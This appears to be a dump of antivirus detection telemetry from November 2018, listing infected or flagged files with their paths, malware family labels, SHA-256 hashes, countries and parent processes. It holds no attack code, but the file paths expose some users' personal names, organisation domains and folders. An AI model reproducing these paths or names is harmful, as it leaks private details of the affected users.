  Row(detection=Row(filename='ts_contf.exe', filepath='D:\\TechnoSchool\\TS_prog\\prog_tf\\ts_contf.exe', filesize=40512000, name='W32/Sality.AT.#M1.#R1'), hash='ed9e06530d5d4573ede78e82be72fcf862ce0b63b8d10403ad1d3b2526523c71', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:FC9Q91pyq0y8HAN2.1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T08:31:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avdula_ahmad.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Avdula_Ahmad.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='6b1d58b6b0eee00fcb53ff8618f245a6faf1f0a0a62765b632ff3ced53578544', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161525-ebf9d396', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161525-EBF9D396', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='c91a9dda6a378280cef785f24fcaf7544e57085e517ca6e8bdf812c255e54c7f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:15:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123900-f5884f4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123837-E2120AA3\\AVSCAN-20181101-123900-F5884F4F', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:39:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152556-73be6c45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0db57455\\AVSCAN-20181101-152536-71846969\\AVSCAN-20181101-152556-73BE6C45', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled (2017_11_08 21_15_05 utc).exe', filepath='\\\\?\\D:\\ServerFolders\\File History Backups\\Admin03\\Admin03@MCCOYOFFICE.local\\DESKTOP-GQ6NIDG\\Data\\C\\Users\\admin03.MCCOYOFFICE\\Downloads\\FileZilla_3.29.0_win64-setup_bundled (2017_11_08 21_15_05 UTC).exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T06:45:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uninstall.exe', filepath='\\\\?\\C:\\Games\\Kick Ass 2\\uninstall.exe', filesize=1664000, name='SPR/RedCap.d5bcb5.#M1.#R1'), hash='d5bcb5182fbe7d528baa0a81789abc91571133ea6728e4a1c77a42e3ae246df9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:06:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='renaultloader.exe', filepath='c:\\program files (x86)\\abrites commander software list\\renault504\\renaultloader.exe', filesize=1664000, name='HEUR/APC.#M1.#R1'), hash='7650bfb391ff1d9c4862b921cb0d606381200e89b5587479f3b1187c068860e2', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Abrites Commander Software List\\QuickLoader.exe', parentsize=3083776, timestamp='2018-11-01T10:32:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110626-d8430f42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110626-D8430F42', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:06:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='basireps.exe', filepath='\\\\?\\C:\\FullProf_Suite\\basireps.exe', filesize=1344000, name='HEUR/APC.#M1.#R1'), hash='e1eac262ab8ceb62f2461b4f450c4f579266690fb435b3826e259cfe48358f43', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:20:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spic.vir', filepath='C:\\Program Files (x86)\\Goral\\spic.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='ca23ef36c43d02666fa97ca6e35451e5d9937aab0f778200aad1f8d7a2736b7e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:56:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nstA4.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:19:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Bakup gamer\\Mineradores\\BTG-nVidia.miner.0.3.4b\\BTG-nVidia.miner.0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4532304, timestamp='2018-11-01T04:03:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4626a5e8716757f8515b1a9ea57a6a81.dll', filepath='C:\\clientcheckallfile\\4626a5e8716757f8515b1a9ea57a6a81.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\clientcheckallfile\\clientcheckfile.exe', parentsize=94208, timestamp='2018-11-01T01:03:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='e9d6cdf12352556038062f1e4a4413c1df0abe4b4b51b2988f7870cafa81cc16', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:24:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T16:07:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-204527-bf0ec4e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_72a51702\\AVSCAN-20181101-204243-A28B5228\\AVSCAN-20181101-204527-BF0EC4E5', filesize=1056000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='4d5550b6882d918bde0c398d782e222dc87f01cadb9c8bc57fbd54b46074b7cb', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:45:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T15:58:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210252-2c88b186', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b4863973\\AVSCAN-20181101-195810-E274B34F\\AVSCAN-20181101-210252-2C88B186', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:02:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='languageid finder.exe', filepath='C:\\Program Files (x86)\\RocketDock\\Tools\\LanguageID Finder.exe', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='4a86dfb1303bcd41fe67c92795f113ddbeb641e9d561accc80aa447a10f40358', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T06:01:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='02bc3a94bf9e67a400a411f3c73528434ca4b108546dcd34e4978e4288da2124', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:38:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000a9080', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000a9080', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:49:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:32:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00091853', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp00091853', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:46:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:34:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='22d9e7d55f9dbd29f9ffff4ba5e88c1c21dcb49e9165fd1894f7bf02a6b50afb', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.categorizing\\22D9E7D55F9DBD29F9FFFF4BA5E88C1C21DCB49E9165FD1894F7BF02A6B50AFB', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='22d9e7d55f9dbd29f9ffff4ba5e88c1c21dcb49e9165fd1894f7bf02a6b50afb', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T09:21:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090821-1949b1ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-224049-77016E40\\AVSCAN-20181102-090821-1949B1AD', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa12924.30484\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa12924.30484\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T19:49:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='intel 825xx gigabit platform lan network device diagnostics utility.exe', filepath='\\\\?\\E:\\Programs\\Compressed\\all drivers for dell Latitude E6510\\winXP\\Intel 825xx Gigabit Platform LAN Network Device Diagnostics Utility.exe', filesize=14336000, name='TR/Crypt.XPACK.Gen3.#M300.#R200074'), hash='0d05e19585bd9b7f82de846ec143fe7aaf1ab4069fb796c2d129a890970d8f5a', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:08:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-004701-7404c7f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1b9c01a\\AVSCAN-20181102-004329-5961C789\\AVSCAN-20181102-004701-7404C7F1', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T23:47:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T04:09:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194032-7b86e03a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e0c94302\\AVSCAN-20181101-193955-76625EEF\\AVSCAN-20181101-194032-7B86E03A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:40:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T15:06:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120412-d7720196', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_46e468d5\\AVSCAN-20181101-120359-D57DE27D\\AVSCAN-20181101-120412-D7720196', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:04:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:33:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235323-07c19e38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-235245-023F16A9\\AVSCAN-20181101-235323-07C19E38', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:53:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tray.bat', filepath='F:\\New folder\\Corel\\Corel Content\\Trays\\Tray\\Tray.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dforrt.dll', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\icemcfd\\win64_amd\\bin\\dforrt.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='3733fc7edd059f37cf9b5173a6c6f1045fb96003a1fc43d6ec004a84970a17bf', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T21:02:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jb09.exe', filepath='F:\\Kerja2\\2015\\PAIM 2015\\New folder\\RTK Johor\\Johor Bahru\\fscommand\\jb09.exe', filesize=14272000, name='HEUR/AGEN.1013731.#M1.#R1'), hash='992996323e93f1c20bfe545716b086c845d109b93b08f3903e98316837e85f79', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T04:54:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='modelli prove varie.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CARTA INTESTATA FALDONI\\MODELLI PROVE VARIE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wolfmp.exe', filepath='\\\\?\\E:\\العاب\\NFS Most Wanted\\wolfenstein\\WolfMP.exe', filesize=1024000, name='TR/Crypt.XPACK.Gen2.#M300.#R100504'), hash='ea84e431e8bae52113bd4e10307b7ecb9001482c800d43d1695cbf4671fc5420', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:17:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gdiplus.dll', filepath='C:\\Program Files (x86)\\OpenOffice 4\\program\\gdiplus.dll', filesize=1860000, name='W32/Ramnit.C.#M1.#R1'), hash='b3b1614ba01b3e6e1788e5f8b8ff0fa4dca6f673fa7d00e28dfb033e26972b57', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:50:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.inf.exe', filepath='F:\\\xa0\\autorun.inf\\autorun.inf.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:29:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145940-90dcdb2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36c54126\\AVSCAN-20181101-145905-8A15D273\\AVSCAN-20181101-145940-90DCDB2C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:59:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='install_virtualdj_home_v7.0.5.exe', filepath='I:\\files\\soft\\install_virtualdj_home_v7.0.5.exe', filesize=36608000, name='TR/Patched.Gen.#M300.#R2947'), hash='a17436293e6f1d060337bfc5cf947019d393cbcb86063b116a058b0722a98925', metadata=Row(cmdline=None, country='KE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T12:31:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081828-587da8f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-081640-431A7124\\AVSCAN-20181101-081828-587DA8F7', filesize=320000, name='TR/Black.Gen2.#M1.#R1'), hash='a6e72df8ccc11a35e64106d808aad51944b2c3ca470a8d6034e0437702dcb7d6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:18:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151247-1f6ce7ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151247-1F6CE7EA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:12:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150431-c06f3770', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150431-C06F3770', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:04:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161332-e020d3b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161332-E020D3B1', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='c67dfb62ab11a84d52a30b3faf2194c9a8922ec55c681dc2e574787dbf624f5a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094438-00c1b0a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094438-00C1B0A4', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:44:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Users\\X\\AppData\\Local\\Smartbar\\Application\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='85b2a4f1594c8b1c4b5899805517daf76fdf97ae31efe7caf45408440e785652', metadata=Row(cmdline=None, country='SE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:51:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pfi asa 583981.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\PFI ASA 583981.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:18:01Z'), dt=datetime.date(2018, 11, 1)),
